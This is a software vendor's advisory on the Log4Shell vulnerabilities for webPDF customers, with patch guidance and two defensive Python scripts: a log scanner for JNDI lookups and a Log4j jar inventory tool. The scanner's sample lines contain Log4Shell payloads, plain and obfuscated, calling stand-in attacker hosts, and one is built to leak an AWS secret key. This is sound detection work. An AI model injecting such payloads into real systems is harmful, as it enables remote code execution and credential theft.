Log4j2 security vulnerabilities – What should webPDF customers be aware of?
Reports about the Log4j 2 security vulnerabilities are currently piling up (more information: Log4j website). The BSI (German Federal Office for Information Security) has even issued a cyber security warning at warning level red and describes the current situation as an "extremely critical threat situation". Many companies are unsettled and are asking whether they are specifically affected and, if so, how best to proceed.
About the Log4j2 vulnerabilities
The vulnerability known as "Log4Shell" (CVE-2021-44228) affects the widely used Log4j logging library for Java applications.
The library is used for high-performance collection of an application's log data. The published vulnerability allows attackers to execute their own program code on systems running Log4j 2.x up to and including version 2.14.1, which can lead to a full compromise of the target system. Exploitation is trivial: it is enough to get a specially crafted string, a JNDI lookup expression of the form ${jndi:...}, into any value that the application logs, for example an HTTP header or a form field. Besides loading additional malware, the vulnerability can be used to exfiltrate confidential data (e.g. environment variables, by embedding a lookup such as ${env:...} in the request sent to the attacker's server) or, under certain circumstances, to cause a DoS (Denial of Service).
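To make the "special string" concrete, here is an added detection example (not code from the original article or from webPDF) that scans log lines for the JNDI lookup expression described above. It also unwraps the obfuscations commonly seen in the wild, where attackers hide the word "jndi" behind nested ${lower:...}, ${upper:...} or default-value lookups such as ${::-j}, so that a naive search for "${jndi:" would miss them. The sample log lines are constructed for this example; hosts and addresses in them are not real.

```python
import re

# Innermost lookup: a ${...} with no nested ${ inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once any obfuscation has been peeled away: ${jndi:<protocol>:...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)
MAX_ROUNDS = 20  # nesting depth we are willing to unwrap


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j's string substitutor would,
    for the handful of lookups attackers use to hide the word 'jndi'."""
    body = match.group(1)
    if ":-" in body:                      # ${env:NOPE:-j} or ${::-j} -> default value "j"
        return body.split(":-", 1)[1]
    key, sep, rest = body.partition(":")
    if sep and key.strip().lower() == "lower":   # ${lower:J} -> "j"
        return rest.lower()
    if sep and key.strip().lower() == "upper":   # ${upper:j} -> "J"
        return rest.upper()
    return match.group(0)                 # anything else is left untouched


def _lookup_expression(text, start):
    """Return the complete ${...} expression starting at `start`, honouring nesting."""
    depth = 0
    i = start
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            i += 2
            continue
        if text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
        i += 1
    return text[start:]


def detect_log4shell(line):
    """Return (protocol, expression) if `line` carries a JNDI lookup, else None.
    The check runs before every unwrapping round, so a plain ${jndi:...} is
    reported immediately and obfuscated forms after they have been resolved."""
    text = line
    for _ in range(MAX_ROUNDS):
        m = JNDI.search(text)
        if m:
            return m.group(1).lower(), _lookup_expression(text, m.start())
        unwrapped = INNERMOST.sub(_resolve, text)
        if unwrapped == text:     # nothing left that we know how to resolve
            break
        text = unwrapped
    return None


def scan(lines):
    """Run the detector over an iterable of log lines; returns [(line_no, protocol, expression)]."""
    hits = []
    for no, line in enumerate(lines, 1):
        found = detect_log4shell(line)
        if found:
            hits.append((no, found[0], found[1]))
    return hits


# Constructed sample log lines (not real traffic): plain, obfuscated and benign cases.
SAMPLE_LINES = [
    '203.0.113.7 - - [10/Dec/2021:12:00:00 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://evil.example:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.5/x}"',
    'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5/Exploit}',
    'User-Agent: ${jndi:ldap://203.0.113.5/${env:AWS_SECRET_ACCESS_KEY}}',
    '198.51.100.2 - - [10/Dec/2021:12:00:02 +0000] "GET /api/docs?q=${price} HTTP/1.1" 200 "-" "Mozilla/5.0"',
    'Request took ${elapsed:-0}ms',
]

if __name__ == "__main__":
    for no, proto, expr in scan(SAMPLE_LINES):
        print(f"line {no}: {proto} lookup -> {expr}")
```

Run it over web server access logs or application logs to find exploitation attempts. Two caveats: a hit only proves that someone tried, not that the attempt reached a vulnerable Log4j instance, and the resolver only knows the lookups used for obfuscation (lower, upper, default values), so new encoding tricks need to be added as they appear.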
What should webPDF customers be aware of?
For webPDF customers we recommend the following procedure:
- webPDF 8: uses Log4j 2 and is therefore affected. We strongly recommend updating to the current webPDF 8 version; no other mitigation is offered.
- webPDF 7: not affected, because it uses Log4j version 1, which does not have the JNDI lookup that Log4Shell exploits.
Please read our detailed notes in the webPDF blog:
Here you can find our latest security updates:
webPDF 8 revision 2376, which updates the bundled Log4j to version 2.17, is available on the download page. The Linux packages at https://packages.softvision.de/ and the container "softvisiondev/webpdf" on Docker Hub have been updated accordingly.
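After installing an update, the check a practitioner wants is to confirm which log4j-core jars the running deployment actually contains, including jars nested in .war/.ear archives and copies that may have been left behind elsewhere on the host. The following inventory script is an added example, not part of the original article or of webPDF's own tooling, and the directory tree it scans in its demo is constructed in a temporary directory for illustration. It reads the version from the Maven pom.properties inside each jar, checks whether JndiLookup.class is still present (removing that class was the widely used emergency mitigation), and classifies the version against the 2.15.0 / 2.16.0 / 2.17.0 fixes.

```python
import io
import os
import re
import tempfile
import zipfile

# Markers inside a jar that identify what it is.
CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J1_MARKER = "org/apache/log4j/Logger.class"
NESTED_ARCHIVES = (".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a suffix such as '2.0-beta9' is ignored (-> (2, 0))."""
    return tuple(int(p) for p in re.findall(r"\d+", text.split("-", 1)[0]))


def classify(version, jndi_lookup_present=True):
    """Status of a log4j-core version on the main 2.x line. The Java 7/6 backport
    branches (2.12.x, 2.3.x) are reported as vulnerable here; check them by hand."""
    v = parse_version(version)
    if v < (2, 15):
        if not jndi_lookup_present:
            return "MITIGATED: JndiLookup.class removed from jar (still update!)"
        return "VULNERABLE: Log4Shell RCE (CVE-2021-44228)"
    if v < (2, 16):
        return "VULNERABLE: incomplete fix (CVE-2021-45046)"
    if v < (2, 17):
        return "VULNERABLE: lookup recursion DoS (CVE-2021-45105)"
    return "OK: 2.17.0 or later"


def inspect_jar(source, label):
    """`source` is a path or a file-like object (for a jar nested in a war/ear).
    Returns a finding for log4j-core and Log4j 1.x jars, None for anything else."""
    try:
        with zipfile.ZipFile(source) as zf:
            names = set(zf.namelist())
            if CORE_POM in names:
                props = zf.read(CORE_POM).decode("utf-8", "replace")
                m = re.search(r"^version=(.+)$", props, re.M)
                version = m.group(1).strip() if m else None
                present = JNDI_LOOKUP_CLASS in names
                status = classify(version, present) if version else "UNKNOWN: no version in pom.properties"
                return {"path": label, "kind": "log4j-core", "version": version,
                        "jndi_lookup_present": present, "status": status}
            if LOG4J1_MARKER in names:
                return {"path": label, "kind": "log4j-1.x", "version": None,
                        "jndi_lookup_present": False,
                        "status": "NOT AFFECTED by CVE-2021-44228 (Log4j 1.x has no JNDI lookup)"}
    except zipfile.BadZipFile:
        pass
    return None


def scan_tree(root):
    """Walk `root`, inspecting every .jar and every .jar nested one level inside a war/ear/zip."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower().endswith(".jar"):
                findings.append(inspect_jar(path, path))
            elif name.lower().endswith(NESTED_ARCHIVES):
                try:
                    with zipfile.ZipFile(path) as outer:
                        for entry in outer.namelist():
                            if entry.lower().endswith(".jar"):
                                findings.append(inspect_jar(io.BytesIO(outer.read(entry)), f"{path}!{entry}"))
                except zipfile.BadZipFile:
                    continue
    return sorted((f for f in findings if f), key=lambda f: f["path"])


# --- constructed sample tree for the demo (stand-ins, not real webPDF files) ---
def _jar_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def _write(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def build_sample_tree(root):
    pom = lambda v: f"#Generated by Maven\nversion={v}\ngroupId=org.apache.logging.log4j\n"
    _write(os.path.join(root, "lib", "log4j-core-2.14.1.jar"),
           _jar_bytes({CORE_POM: pom("2.14.1"), JNDI_LOOKUP_CLASS: b""}))
    _write(os.path.join(root, "lib", "log4j-core-2.14.1-patched.jar"),
           _jar_bytes({CORE_POM: pom("2.14.1")}))            # JndiLookup.class deleted
    _write(os.path.join(root, "lib", "log4j-core-2.17.1.jar"),
           _jar_bytes({CORE_POM: pom("2.17.1"), JNDI_LOOKUP_CLASS: b""}))
    _write(os.path.join(root, "lib", "log4j-api-2.17.1.jar"),
           _jar_bytes({"org/apache/logging/log4j/Logger.class": b""}))  # api only: no finding
    _write(os.path.join(root, "legacy", "log4j-1.2.17.jar"),
           _jar_bytes({LOG4J1_MARKER: b""}))
    _write(os.path.join(root, "webapps", "app.war"),
           _jar_bytes({"WEB-INF/lib/log4j-core-2.16.0.jar":
                       _jar_bytes({CORE_POM: pom("2.16.0"), JNDI_LOOKUP_CLASS: b""})}))


def demo():
    """Build the constructed tree in a temp dir, scan it, return {relative path: status}."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return {f["path"][len(root) + 1:].replace(os.sep, "/"): f["status"] for f in scan_tree(root)}


if __name__ == "__main__":
    for path, status in demo().items():
        print(f"{status:60s} {path}")
```

On a real host, replace the demo with scan_tree("/path/to/webPDF") or scan_tree("/") and treat every line that is not "OK" or "NOT AFFECTED" as work to do; a jar the script does not recognise (for example a shaded jar that repackages Log4j under another path) will not show up, so a clean result is evidence, not proof.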